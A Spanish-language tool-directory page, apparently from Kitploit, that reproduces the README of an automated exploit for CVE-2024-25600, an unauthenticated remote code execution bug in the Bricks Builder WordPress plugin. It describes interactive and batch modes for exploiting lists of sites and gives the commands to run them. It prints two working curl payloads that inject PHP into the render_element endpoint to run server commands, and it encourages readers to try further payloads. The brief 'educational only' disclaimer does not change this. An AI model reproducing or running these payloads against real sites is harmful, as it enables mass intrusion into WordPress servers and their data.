Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-25600-Bricks-Builder-WordPress — Herramienta de explotación automatizada para CVE-2024-25600, que permite la ejecución remota de código no autenticada en sitios WordPress que utilizan el plugin Bricks Builder. Soporta modos interactivo y por lotes para la ejecución de comandos. | Kitploit
Herramientas/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

Herramienta de explotación automatizada para CVE-2024-25600, que permite la ejecución remota de código no autenticada en sitios WordPress que utilizan el plugin Bricks Builder. Soporta modos interactivo y por lotes para la ejecución de comandos.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 2 añosAún no revisado

Herramienta de Explotación CVE-2024-25600 🚀

Descripción 📝

Esta herramienta 🛠️ está diseñada para explotar la vulnerabilidad CVE-2024-25600 🕳️ encontrada en el plugin Bricks Builder para WordPress. La vulnerabilidad permite la ejecución remota de código no autenticado en sitios web afectados 💻. La herramienta automatiza el proceso de explotación obteniendo nonces y enviando solicitudes especialmente diseñadas para ejecutar comandos arbitrarios.

Características 🌟

  • Modo Interactivo: Interactúa con el sitio web objetivo en tiempo real 🕹️.
  • Modo por Lotes: Escanea y explota múltiples sitios web desde una lista 📋.
  • Ejecución de Comandos: Ejecuta comandos arbitrarios en el servidor objetivo ⚙️.

Instalación 🛠️

  1. Clona este repositorio en tu máquina local 🖥️ usando git clone.
  2. Navega al directorio del repositorio clonado.
  3. Instala las bibliotecas de Python requeridas usando pip install -r requirements.txt.

Uso 📖

Modo Interactivo 🎮

  1. Ejecuta la herramienta con python exploit.py -u <URL> para iniciar el modo interactivo.
  2. Sigue las indicaciones en pantalla para enviar comandos al servidor objetivo.

Modo por Lotes 📊

  1. Prepara un archivo de texto con una lista de URLs objetivo.
  2. Ejecuta la herramienta con python exploit.py -l <ruta_del_archivo> para escanear y explotar los sitios listados.

Prueba de Concepto (PoC) 📝

La PoC base proporcionada por la divulgación es la siguiente:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Actualización: Segunda PoC (más confiable)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Es posible que cargas útiles adicionales puedan dar mejores resultados. Si mi exploit o prueba de concepto no funciona para ti, te animo a experimentar con cargas útiles alternativas para encontrar una solución más efectiva.

Reemplaza [HOST] con el sitio web objetivo y [NONCE] con el valor del nonce obtenido del sitio.

Referencia 📖

Para más información sobre la vulnerabilidad CVE-2024-25600, consulta la divulgación detallada en Snicco.io.

Aviso Legal ⚠️

La información proporcionada en este README es solo con fines educativos. El acceso no autorizado a sitios web o redes es ilegal y poco ético. 🚫

Agradecimientos 🙏

Reconocimiento a los investigadores de seguridad que descubrieron y reportaron esta vulnerabilidad, proporcionando a la comunidad información y herramientas para ayudar a asegurar sus aplicaciones web.

Descargar herramienta